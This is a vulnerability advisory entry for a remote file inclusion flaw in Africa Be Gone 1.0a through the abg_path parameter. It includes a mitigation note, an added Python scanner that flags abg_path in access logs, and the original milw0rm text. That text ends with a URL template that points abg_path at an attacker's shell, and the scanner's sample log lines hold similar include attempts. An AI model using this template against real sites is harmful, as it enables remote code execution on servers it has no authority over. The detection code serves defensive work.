Vendor: Africa Be Gone
By: Lo$er
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 94
Product Name: Africa Be Gone
Affected Version From: 1.0a
Affected Version To: 1.0a
Patch Exists: No
Related CWE: CVE-2008-3790
CPE: a:africabegone:africa_be_gone
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Africa Be Gone version 1.0a Remote File Inclusion

Africa Be Gone version 1.0a is vulnerable to Remote File Inclusion. An attacker can make the application include a remote file, usually by supplying a malicious URL, and the arbitrary code in that file is then executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated.
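
While no patch exists, requests that try to set `abg_path` can be found in web server logs. The following is an added example, not code from the advisory or the vendor: it assumes combined-format access logs, and the `/abg/` install path, client addresses and host names in the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); addresses and hosts are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Aug/2008:10:02:11 +0000] "GET /abg/index.php?abg_path=http://files.example.net/x.txt? HTTP/1.1" 200 512
198.51.100.7 - - [01/Aug/2008:10:02:15 +0000] "GET /abg/index.php?page=home HTTP/1.1" 200 2048
203.0.113.9 - - [01/Aug/2008:10:05:40 +0000] "GET /abg/index.php?page=1&abg_path=hTTp%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 512
192.0.2.33 - - [01/Aug/2008:10:09:30 +0000] "GET /abg/index.php?abg_path=includes/ HTTP/1.1" 200 2048
"""

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Any leading URL scheme (http:, ftp:, ...), matched case-insensitively.
URL_SCHEME = re.compile(r'^\s*[a-z][a-z0-9+.\-]*:', re.IGNORECASE)
PARAM = "abg_path"  # parameter named in the advisory


def scan(log_text):
    """Return (client, severity, decoded_value) for each request carrying abg_path."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target = m.groups()
        # parse_qsl percent-decodes once, so encoded schemes are seen in clear.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name != PARAM:
                continue
            # A URL scheme means a remote include attempt; any other value is
            # still a client trying to override an internal path variable.
            severity = "remote-include" if URL_SCHEME.match(value) else "path-override"
            findings.append((client, severity, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Because `abg_path` is an internal path variable, any request that supplies it is worth reviewing, not only those whose value carries a URL scheme.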
Source

Exploit-DB raw data:

=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initialized but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]